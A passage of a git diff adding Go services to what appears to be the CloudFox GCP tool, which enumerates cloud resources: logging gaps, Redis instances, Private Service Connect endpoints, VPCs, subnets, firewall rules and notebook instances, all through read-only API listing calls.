>= 2 { + // Bucket name might encode project, but typically doesn't + project = "" + } + case strings.HasPrefix(destination, "bigquery.googleapis.com/"): + destType = "bigquery" + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + case strings.HasPrefix(destination, "pubsub.googleapis.com/"): + destType = "pubsub" + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + case strings.HasPrefix(destination, "logging.googleapis.com/"): + destType = "logging" + // Format: logging.googleapis.com/projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + default: + destType = "unknown" + } + return +} + +// extractBucketName extracts bucket name from storage destination +func extractBucketName(destination string) string { + // Format: storage.googleapis.com/bucket-name + parts := strings.SplitN(destination, "/", 2) + if len(parts) >= 2 { + return parts[1] + } + return destination +} + +// extractDatasetName extracts dataset name from BigQuery destination +func extractDatasetName(destination string) string { + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + if idx := strings.Index(destination, "/datasets/"); idx >= 0 { + remainder := destination[idx+len("/datasets/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + return remainder[:slashIdx] + } + return remainder + } + return "" +} + +// extractTopicName extracts topic name from Pub/Sub destination +func extractTopicName(destination string) string { + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + if idx := strings.Index(destination, "/topics/"); idx >= 0 { + return destination[idx+len("/topics/"):] + } + return "" +} + +// ============================================ +// Logging Gaps - Resource Logging Configuration +// ============================================ + +// LoggingGap represents a resource with missing or incomplete logging +type LoggingGap struct { + ResourceType string // bucket, subnet, gke, cloudsql, log-sink, project + ResourceName string + ProjectID string + Location string + LoggingStatus string // disabled, partial, enabled + MissingLogs []string // Which logs are missing +} + +// getStorageService returns a Storage service client using cached session if available +func (ls *LoggingService) getStorageService(ctx context.Context) (*storage.Service, error) { + if ls.session != nil { + return sdk.CachedGetStorageService(ctx, ls.session) + } + return storage.NewService(ctx) +} + +// getComputeService returns a Compute service client using cached session if available +func (ls *LoggingService) getComputeService(ctx context.Context) (*compute.Service, error) { + if ls.session != nil { + return sdk.CachedGetComputeService(ctx, ls.session) + } + return compute.NewService(ctx) +} + +// getContainerService returns a Container service client using cached session if available +func (ls *LoggingService) getContainerService(ctx context.Context) (*container.Service, error) { + if ls.session != nil { + return sdk.CachedGetContainerService(ctx, ls.session) + } + return container.NewService(ctx) +} + +// getSQLAdminService returns a SQL Admin service client using cached session if available +func (ls *LoggingService) getSQLAdminService(ctx context.Context) (*sqladmin.Service, error) { + if ls.session != nil { + return sdk.CachedGetSQLAdminServiceBeta(ctx, ls.session) + } + return sqladmin.NewService(ctx) +} + +// LoggingGaps finds resources with logging gaps in a project +func (ls *LoggingService) LoggingGaps(projectID string) ([]LoggingGap, error) { + var gaps []LoggingGap + + // Check various resource types for logging gaps + if bucketGaps, err := ls.checkBucketLogging(projectID); err == nil { + gaps = append(gaps, bucketGaps...) + } + + if computeGaps, err := ls.checkSubnetLogging(projectID); err == nil { + gaps = append(gaps, computeGaps...) + } + + if gkeGaps, err := ls.checkGKELogging(projectID); err == nil { + gaps = append(gaps, gkeGaps...) + } + + if sqlGaps, err := ls.checkCloudSQLLogging(projectID); err == nil { + gaps = append(gaps, sqlGaps...) + } + + return gaps, nil +} + +// checkBucketLogging checks GCS buckets for access logging configuration +func (ls *LoggingService) checkBucketLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := ls.getStorageService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + resp, err := service.Buckets.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, bucket := range resp.Items { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check if bucket access logging is enabled + if bucket.Logging == nil || bucket.Logging.LogBucket == "" { + missingLogs = append(missingLogs, "Access logs disabled") + loggingStatus = "disabled" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + Location: bucket.Location, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +// checkSubnetLogging checks VPC subnets for flow log configuration +func (ls *LoggingService) checkSubnetLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := ls.getComputeService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + // Check VPC flow logs on subnets + req := service.Subnetworks.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for region, subnets := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, subnet := range subnets.Subnetworks { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check if VPC flow logs are enabled + if subnet.LogConfig == nil || !subnet.LogConfig.Enable { + missingLogs = append(missingLogs, "VPC Flow Logs disabled") + loggingStatus = "disabled" + } else if subnet.LogConfig.AggregationInterval != "INTERVAL_5_SEC" { + missingLogs = append(missingLogs, "VPC Flow Logs not at max granularity") + loggingStatus = "partial" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "subnet", + ResourceName: subnet.Name, + ProjectID: projectID, + Location: regionName, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + } + gaps = append(gaps, gap) + } + } + } + return nil + }) + + return gaps, err +} + +// checkGKELogging checks GKE clusters for logging configuration +func (ls *LoggingService) checkGKELogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := ls.getContainerService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := service.Projects.Locations.Clusters.List(parent).Do() + if err != nil { + return nil, err + } + + for _, cluster := range resp.Clusters { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check logging service + if cluster.LoggingService == "" || cluster.LoggingService == "none" { + missingLogs = append(missingLogs, "Cluster logging disabled") + loggingStatus = "disabled" + } else if cluster.LoggingService != "logging.googleapis.com/kubernetes" { + missingLogs = append(missingLogs, "Not using Cloud Logging") + loggingStatus = "partial" + } + + // Check monitoring service + if cluster.MonitoringService == "" || cluster.MonitoringService == "none" { + missingLogs = append(missingLogs, "Cluster monitoring disabled") + } + + // Check for specific logging components + if cluster.LoggingConfig != nil && cluster.LoggingConfig.ComponentConfig != nil { + components := cluster.LoggingConfig.ComponentConfig.EnableComponents + hasSystemComponents := false + hasWorkloads := false + for _, comp := range components { + if comp == "SYSTEM_COMPONENTS" { + hasSystemComponents = true + } + if comp == "WORKLOADS" { + hasWorkloads = true + } + } + if !hasSystemComponents { + missingLogs = append(missingLogs, "System component logs disabled") + } + if !hasWorkloads { + missingLogs = append(missingLogs, "Workload logs disabled") + } + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "gke", + ResourceName: cluster.Name, + ProjectID: projectID, + Location: cluster.Location, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +// checkCloudSQLLogging checks Cloud SQL instances for logging configuration +func (ls *LoggingService) checkCloudSQLLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := ls.getSQLAdminService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + resp, err := service.Instances.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, instance := range resp.Items { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check database flags for logging + if instance.Settings != nil && instance.Settings.DatabaseFlags != nil { + hasQueryLogging := false + hasConnectionLogging := false + + for _, flag := range instance.Settings.DatabaseFlags { + // MySQL flags + if flag.Name == "general_log" && flag.Value == "on" { + hasQueryLogging = true + } + // PostgreSQL flags + if flag.Name == "log_statement" && flag.Value == "all" { + hasQueryLogging = true + } + if flag.Name == "log_connections" && flag.Value == "on" { + hasConnectionLogging = true + } + } + + if !hasQueryLogging { + missingLogs = append(missingLogs, "Query logging not enabled") + loggingStatus = "partial" + } + if !hasConnectionLogging { + missingLogs = append(missingLogs, "Connection logging not enabled") + } + } else { + missingLogs = append(missingLogs, "No logging flags configured") + loggingStatus = "disabled" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "cloudsql", + ResourceName: instance.Name, + ProjectID: projectID, + Location: instance.Region, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} diff --git a/gcp/services/memorystoreService/memorystoreService.go b/gcp/services/memorystoreService/memorystoreService.go new file mode 100644 index 00000000..99cee11f --- /dev/null +++ b/gcp/services/memorystoreService/memorystoreService.go @@ -0,0 +1,107 @@ +package memorystoreservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + redis "google.golang.org/api/redis/v1" +) + +type MemorystoreService struct { + session *gcpinternal.SafeSession +} + +func New() *MemorystoreService { + return &MemorystoreService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *MemorystoreService { + return &MemorystoreService{session: session} +} + +// getService returns a Redis service client using cached session if available +func (s *MemorystoreService) getService(ctx context.Context) (*redis.Service, error) { + if s.session != nil { + return sdk.CachedGetRedisService(ctx, s.session) + } + return redis.NewService(ctx) +} + +// RedisInstanceInfo represents a Redis instance +type RedisInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + Tier string `json:"tier"` // BASIC or STANDARD_HA + MemorySizeGB int64 `json:"memorySizeGb"` + RedisVersion string `json:"redisVersion"` + Host string `json:"host"` + Port int64 `json:"port"` + State string `json:"state"` + AuthEnabled bool `json:"authEnabled"` + TransitEncryption string `json:"transitEncryption"` // DISABLED, SERVER_AUTHENTICATION + ConnectMode string `json:"connectMode"` // DIRECT_PEERING or PRIVATE_SERVICE_ACCESS + AuthorizedNetwork string `json:"authorizedNetwork"` + ReservedIPRange string `json:"reservedIpRange"` + CreateTime string `json:"createTime"` +} + +// ListRedisInstances retrieves all Redis instances in a project +func (s *MemorystoreService) ListRedisInstances(projectID string) ([]RedisInstanceInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "redis.googleapis.com") + } + + var instances []RedisInstanceInfo + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *redis.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := s.parseRedisInstance(instance, projectID) + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "redis.googleapis.com") + } + + return instances, nil +} + +func (s *MemorystoreService) parseRedisInstance(instance *redis.Instance, projectID string) RedisInstanceInfo { + return RedisInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, + Location: instance.LocationId, + DisplayName: instance.DisplayName, + Tier: instance.Tier, + MemorySizeGB: instance.MemorySizeGb, + RedisVersion: instance.RedisVersion, + Host: instance.Host, + Port: instance.Port, + State: instance.State, + AuthEnabled: instance.AuthEnabled, + TransitEncryption: instance.TransitEncryptionMode, + ConnectMode: instance.ConnectMode, + AuthorizedNetwork: instance.AuthorizedNetwork, + ReservedIPRange: instance.ReservedIpRange, + CreateTime: instance.CreateTime, + } +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/networkEndpointsService/networkEndpointsService.go b/gcp/services/networkEndpointsService/networkEndpointsService.go new file mode 100644 index 00000000..cde0542c --- /dev/null +++ b/gcp/services/networkEndpointsService/networkEndpointsService.go @@ -0,0 +1,309 @@ +package networkendpointsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + compute "google.golang.org/api/compute/v1" + servicenetworking "google.golang.org/api/servicenetworking/v1" +) + +type NetworkEndpointsService struct { + session *gcpinternal.SafeSession +} + +func New() *NetworkEndpointsService { + return &NetworkEndpointsService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *NetworkEndpointsService { + return &NetworkEndpointsService{ + session: session, + } +} + +// getComputeService returns a Compute service client using cached session if available +func (s *NetworkEndpointsService) getComputeService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// getServiceNetworkingService returns a Service Networking service client using cached session if available +func (s *NetworkEndpointsService) getServiceNetworkingService(ctx context.Context) (*servicenetworking.APIService, error) { + if s.session != nil { + return sdk.CachedGetServiceNetworkingService(ctx, s.session) + } + return servicenetworking.NewService(ctx) +} + +// PrivateServiceConnectEndpoint represents a PSC endpoint +type PrivateServiceConnectEndpoint struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + IPAddress string `json:"ipAddress"` + Target string `json:"target"` // Service attachment or API + TargetType string `json:"targetType"` // google-apis, service-attachment + ConnectionState string `json:"connectionState"` +} + +// PrivateConnection represents a private service connection (e.g., for Cloud SQL) +type PrivateConnection struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + Service string `json:"service"` + ReservedRanges []string `json:"reservedRanges"` + PeeringName string `json:"peeringName"` + AccessibleServices []string `json:"accessibleServices"` +} + +// ServiceAttachmentIAMBinding represents an IAM binding for a service attachment +type ServiceAttachmentIAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ServiceAttachment represents a PSC service attachment (producer side) +type ServiceAttachment struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + TargetService string `json:"targetService"` + ConnectionPreference string `json:"connectionPreference"` // ACCEPT_AUTOMATIC, ACCEPT_MANUAL + ConsumerAcceptLists []string `json:"consumerAcceptLists"` + ConsumerRejectLists []string `json:"consumerRejectLists"` + EnableProxyProtocol bool `json:"enableProxyProtocol"` + NatSubnets []string `json:"natSubnets"` + ConnectedEndpoints int `json:"connectedEndpoints"` + IAMBindings []ServiceAttachmentIAMBinding `json:"iamBindings"` +} + +// GetPrivateServiceConnectEndpoints retrieves PSC forwarding rules +func (s *NetworkEndpointsService) GetPrivateServiceConnectEndpoints(projectID string) ([]PrivateServiceConnectEndpoint, error) { + ctx := context.Background() + service, err := s.getComputeService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var endpoints []PrivateServiceConnectEndpoint + + // List forwarding rules across all regions + req := service.ForwardingRules.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for region, scopedList := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, rule := range scopedList.ForwardingRules { + // Check if this is a PSC endpoint + if rule.Target == "" { + continue + } + + // PSC endpoints target service attachments or Google APIs + isPSC := false + targetType := "" + + if strings.Contains(rule.Target, "serviceAttachments") { + isPSC = true + targetType = "service-attachment" + } else if strings.Contains(rule.Target, "all-apis") || + strings.Contains(rule.Target, "vpc-sc") || + rule.Target == "all-apis" { + isPSC = true + targetType = "google-apis" + } + + if !isPSC { + continue + } + + endpoint := PrivateServiceConnectEndpoint{ + Name: rule.Name, + ProjectID: projectID, + Region: regionName, + Network: extractName(rule.Network), + Subnetwork: extractName(rule.Subnetwork), + IPAddress: rule.IPAddress, + Target: rule.Target, + TargetType: targetType, + } + + // Check connection state (for PSC endpoints to service attachments) + if rule.PscConnectionStatus != "" { + endpoint.ConnectionState = rule.PscConnectionStatus + } else { + endpoint.ConnectionState = "ACTIVE" + } + + endpoints = append(endpoints, endpoint) + } + } + return nil + }) + + return endpoints, err +} + +// GetPrivateConnections retrieves private service connections +func (s *NetworkEndpointsService) GetPrivateConnections(projectID string) ([]PrivateConnection, error) { + ctx := context.Background() + service, err := s.getServiceNetworkingService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "servicenetworking.googleapis.com") + } + + var connections []PrivateConnection + + // List connections for the project's networks + computeService, err := s.getComputeService(ctx) + if err != nil { + return nil, err + } + + // Get all networks + networks, err := computeService.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, network := range networks.Items { + networkName := fmt.Sprintf("projects/%s/global/networks/%s", projectID, network.Name) + + // List connections for this network + resp, err := service.Services.Connections.List("services/servicenetworking.googleapis.com"). + Network(networkName).Context(ctx).Do() + if err != nil { + continue // May not have permissions or no connections + } + + for _, conn := range resp.Connections { + connection := PrivateConnection{ + Name: conn.Peering, + ProjectID: projectID, + Network: network.Name, + Service: conn.Service, + ReservedRanges: conn.ReservedPeeringRanges, + PeeringName: conn.Peering, + } + + // Determine accessible services based on the connection + connection.AccessibleServices = s.determineAccessibleServices(conn.Service) + + connections = append(connections, connection) + } + } + + return connections, nil +} + +// GetServiceAttachments retrieves PSC service attachments (producer side) +func (s *NetworkEndpointsService) GetServiceAttachments(projectID string) ([]ServiceAttachment, error) { + ctx := context.Background() + service, err := s.getComputeService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var attachments []ServiceAttachment + + req := service.ServiceAttachments.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ServiceAttachmentAggregatedList) error { + for region, scopedList := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, attachment := range scopedList.ServiceAttachments { + sa := ServiceAttachment{ + Name: attachment.Name, + ProjectID: projectID, + Region: regionName, + TargetService: extractName(attachment.TargetService), + ConnectionPreference: attachment.ConnectionPreference, + EnableProxyProtocol: attachment.EnableProxyProtocol, + } + + // Extract NAT subnets + for _, subnet := range attachment.NatSubnets { + sa.NatSubnets = append(sa.NatSubnets, extractName(subnet)) + } + + // Count connected endpoints + if attachment.ConnectedEndpoints != nil { + sa.ConnectedEndpoints = len(attachment.ConnectedEndpoints) + } + + // Extract consumer accept/reject lists + for _, accept := range attachment.ConsumerAcceptLists { + sa.ConsumerAcceptLists = append(sa.ConsumerAcceptLists, accept.ProjectIdOrNum) + } + for _, reject := range attachment.ConsumerRejectLists { + sa.ConsumerRejectLists = append(sa.ConsumerRejectLists, reject) + } + + // Get IAM bindings for the service attachment + sa.IAMBindings = s.getServiceAttachmentIAMBindings(ctx, service, projectID, regionName, attachment.Name) + + attachments = append(attachments, sa) + } + } + return nil + }) + + return attachments, err +} + +// getServiceAttachmentIAMBindings retrieves IAM bindings for a service attachment +func (s *NetworkEndpointsService) getServiceAttachmentIAMBindings(ctx context.Context, service *compute.Service, projectID, region, attachmentName string) []ServiceAttachmentIAMBinding { + policy, err := service.ServiceAttachments.GetIamPolicy(projectID, region, attachmentName).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []ServiceAttachmentIAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, ServiceAttachmentIAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + return bindings +} + +func (s *NetworkEndpointsService) determineAccessibleServices(service string) []string { + // Map service names to what they provide access to + serviceMap := map[string][]string{ + "servicenetworking.googleapis.com": {"Cloud SQL", "Memorystore", "Filestore", "Cloud Build"}, + } + + if services, ok := serviceMap[service]; ok { + return services + } + return []string{service} +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/networkService/networkService.go b/gcp/services/networkService/networkService.go index 382db204..c54e79be 100644 --- a/gcp/services/networkService/networkService.go +++ b/gcp/services/networkService/networkService.go @@ -7,6 +7,8 @@ import ( "strings" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/compute/v1" ) @@ -57,17 +59,31 @@ type Endpoint struct { } type NetwworkService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new NetworkService (legacy - uses ADC directly) func New() *NetwworkService { return &NetwworkService{} } +// NewWithSession creates a NetworkService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *NetwworkService { + return &NetwworkService{session: session} +} + +// getService returns a compute service, using cached wrapper if session is available +func (ns *NetwworkService) getService(ctx context.Context) (*compute.Service, error) { + if ns.session != nil { + return sdk.CachedGetComputeService(ctx, ns.session) + } + return compute.NewService(ctx) +} + // Returns firewall rules for a project. func (ns *NetwworkService) FirewallRules(projectID string) ([]*compute.Firewall, error) { ctx := context.Background() - computeService, err := compute.NewService(ctx) + computeService, err := ns.getService(ctx) if err != nil { return nil, err } @@ -108,7 +124,9 @@ func getIPAddressesForTargetTag(instances []ComputeEngineService.ComputeEngineIn var ips []string for _, instance := range instances { if contains(instance.Tags.Items, tag) { - ips = append(ips, instance.NetworkInterfaces[0].NetworkIP) + if len(instance.NetworkInterfaces) > 0 { + ips = append(ips, instance.NetworkInterfaces[0].NetworkIP) + } } } return ips, nil @@ -256,5 +274,244 @@ func parseFirewallRule(fw *compute.Firewall, projectID string) (FirewallRule, er }, nil } -// TODO -// func (ns *NetworkService) ForwardingRules() {} +// VPCInfo holds VPC network details +type VPCInfo struct { + Name string + ProjectID string + Description string + AutoCreateSubnetworks bool + RoutingMode string // REGIONAL or GLOBAL + Mtu int64 + Subnetworks []string + Peerings []VPCPeering + CreationTime string +} + +// VPCPeering holds VPC peering details +type VPCPeering struct { + Name string + Network string + State string + ExportCustomRoutes bool + ImportCustomRoutes bool + ExchangeSubnetRoutes bool +} + +// SubnetInfo holds subnet details +type SubnetInfo struct { + Name string + ProjectID string + Region string + Network string + IPCidrRange string + GatewayAddress string + PrivateIPGoogleAccess bool + Purpose string + StackType string + CreationTime string +} + +// FirewallRuleInfo holds enhanced firewall rule details for security analysis +type FirewallRuleInfo struct { + Name string + ProjectID string + Description string + Network string + Priority int64 + Direction string // INGRESS or EGRESS + Disabled bool + + // Source/Destination + SourceRanges []string + SourceTags []string + SourceSAs []string + DestinationRanges []string + TargetTags []string + TargetSAs []string + + // Traffic + AllowedProtocols map[string][]string // protocol -> ports + DeniedProtocols map[string][]string + + // Security analysis + IsPublicIngress bool // 0.0.0.0/0 in source ranges + IsPublicEgress bool // 0.0.0.0/0 in destination ranges + AllowsAllPorts bool // Empty ports = all ports + LoggingEnabled bool // Firewall logging enabled +} + +// Networks retrieves all VPC networks in a project +func (ns *NetwworkService) Networks(projectID string) ([]VPCInfo, error) { + ctx := context.Background() + computeService, err := ns.getService(ctx) + if err != nil { + return nil, err + } + + var networks []VPCInfo + + networkList, err := computeService.Networks.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, network := range networkList.Items { + info := VPCInfo{ + Name: network.Name, + ProjectID: projectID, + Description: network.Description, + AutoCreateSubnetworks: network.AutoCreateSubnetworks, + RoutingMode: network.RoutingConfig.RoutingMode, + Mtu: network.Mtu, + Subnetworks: network.Subnetworks, + CreationTime: network.CreationTimestamp, + } + + // Parse peerings + for _, peering := range network.Peerings { + info.Peerings = append(info.Peerings, VPCPeering{ + Name: peering.Name, + Network: peering.Network, + State: peering.State, + ExportCustomRoutes: peering.ExportCustomRoutes, + ImportCustomRoutes: peering.ImportCustomRoutes, + ExchangeSubnetRoutes: peering.ExchangeSubnetRoutes, + }) + } + + networks = append(networks, info) + } + + return networks, nil +} + +// Subnets retrieves all subnets in a project +func (ns *NetwworkService) Subnets(projectID string) ([]SubnetInfo, error) { + ctx := context.Background() + computeService, err := ns.getService(ctx) + if err != nil { + return nil, err + } + + var subnets []SubnetInfo + + // List subnets across all regions + subnetList, err := computeService.Subnetworks.AggregatedList(projectID).Do() + if err != nil { + return nil, err + } + + for _, scopedList := range subnetList.Items { + for _, subnet := range scopedList.Subnetworks { + info := SubnetInfo{ + Name: subnet.Name, + ProjectID: projectID, + Region: extractRegionFromURL(subnet.Region), + Network: extractNameFromURL(subnet.Network), + IPCidrRange: subnet.IpCidrRange, + GatewayAddress: subnet.GatewayAddress, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + StackType: subnet.StackType, + CreationTime: subnet.CreationTimestamp, + } + subnets = append(subnets, info) + } + } + + return subnets, nil +} + +// FirewallRulesEnhanced retrieves firewall rules with security analysis +func (ns *NetwworkService) FirewallRulesEnhanced(projectID string) ([]FirewallRuleInfo, error) { + ctx := context.Background() + computeService, err := ns.getService(ctx) + if err != nil { + return nil, err + } + + var rules []FirewallRuleInfo + + firewallList, err := computeService.Firewalls.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, fw := range firewallList.Items { + info := FirewallRuleInfo{ + Name: fw.Name, + ProjectID: projectID, + Description: fw.Description, + Network: extractNameFromURL(fw.Network), + Priority: fw.Priority, + Direction: fw.Direction, + Disabled: fw.Disabled, + SourceRanges: fw.SourceRanges, + SourceTags: fw.SourceTags, + SourceSAs: fw.SourceServiceAccounts, + DestinationRanges: fw.DestinationRanges, + TargetTags: fw.TargetTags, + TargetSAs: fw.TargetServiceAccounts, + AllowedProtocols: make(map[string][]string), + DeniedProtocols: make(map[string][]string), + } + + // Parse allowed protocols + for _, allowed := range fw.Allowed { + info.AllowedProtocols[allowed.IPProtocol] = allowed.Ports + if len(allowed.Ports) == 0 { + info.AllowsAllPorts = true + } + } + + // Parse denied protocols + for _, denied := range fw.Denied { + info.DeniedProtocols[denied.IPProtocol] = denied.Ports + } + + // Security analysis - check for public ingress/egress + for _, source := range fw.SourceRanges { + if source == "0.0.0.0/0" || source == "::/0" { + info.IsPublicIngress = true + break + } + } + for _, dest := range fw.DestinationRanges { + if dest == "0.0.0.0/0" || dest == "::/0" { + info.IsPublicEgress = true + break + } + } + + // Check if logging is enabled + if fw.LogConfig != nil && fw.LogConfig.Enable { + info.LoggingEnabled = true + } + + rules = append(rules, info) + } + + return rules, nil +} + +// Helper functions +func extractNameFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func extractRegionFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +// GetComputeService returns a compute.Service instance for external use +func (ns *NetwworkService) GetComputeService(ctx context.Context) (*compute.Service, error) { + return ns.getService(ctx) +} diff --git a/gcp/services/notebooksService/notebooksService.go b/gcp/services/notebooksService/notebooksService.go new file mode 100644 index 00000000..5127bc73 --- /dev/null +++ b/gcp/services/notebooksService/notebooksService.go @@ -0,0 +1,223 @@ +package notebooksservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + notebooks "google.golang.org/api/notebooks/v1" +) + +type NotebooksService struct { + session *gcpinternal.SafeSession +} + +func New() *NotebooksService { + return &NotebooksService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *NotebooksService { + return &NotebooksService{session: session} +} + +// getService returns a Notebooks service client using cached session if available +func (s *NotebooksService) getService(ctx context.Context) (*notebooks.Service, error) { + if s.session != nil { + return sdk.CachedGetNotebooksService(ctx, s.session) + } + return notebooks.NewService(ctx) +} + +// NotebookInstanceInfo represents a Vertex AI Workbench or legacy notebook instance +type NotebookInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` + NoPublicIP bool `json:"noPublicIp"` + NoProxyAccess bool `json:"noProxyAccess"` + ProxyUri string `json:"proxyUri"` + Creator string `json:"creator"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Disk config + BootDiskType string `json:"bootDiskType"` + BootDiskSizeGB int64 `json:"bootDiskSizeGb"` + DataDiskType string `json:"dataDiskType"` + DataDiskSizeGB int64 `json:"dataDiskSizeGb"` + + // GPU config + AcceleratorType string `json:"acceleratorType"` + AcceleratorCount int64 `json:"acceleratorCount"` + + // Other config + InstallGpuDriver bool `json:"installGpuDriver"` + CustomContainer bool `json:"customContainer"` +} + +// RuntimeInfo represents a managed notebook runtime +type RuntimeInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + RuntimeType string `json:"runtimeType"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` +} + +// ListInstances retrieves all notebook instances +func (s *NotebooksService) ListInstances(projectID string) ([]NotebookInstanceInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + var instances []NotebookInstanceInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, 